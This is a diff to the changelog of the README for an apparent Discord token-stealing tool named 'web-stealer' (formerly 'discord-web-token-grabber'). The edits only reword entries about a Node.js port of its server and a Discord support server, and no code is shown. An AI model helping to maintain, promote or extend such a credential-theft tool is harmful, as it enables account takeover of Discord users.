I-Skid/web-stealer/README.md

 ## Logs

-- **July 14, 2023**: Rewrote [`server.py`](https://github.com/I-Skid/discord-web-token-grabber/blob/main/server.js) in Node.js for people who want to use node.js instead of python, no difference.
+- **July 14, 2023**: Rewrote [`server.py`](https://github.com/I-Skid/web-stealer/blob/main/server.js) in Node.js for those who prefer to use Node.js instead of Python.
+There's no difference in functionality.
-- **Aug 14, 2023**: One month later, made a new discord server for support and questions, join [here](https://discord.gg/CUdzAEyYVK).
+- **August 14, 2023**: Created a new Discord server for providing support and answering questions.
+Feel free to join us [here](https://discord.gg/CUdzAEyYVK).

 ## Platforms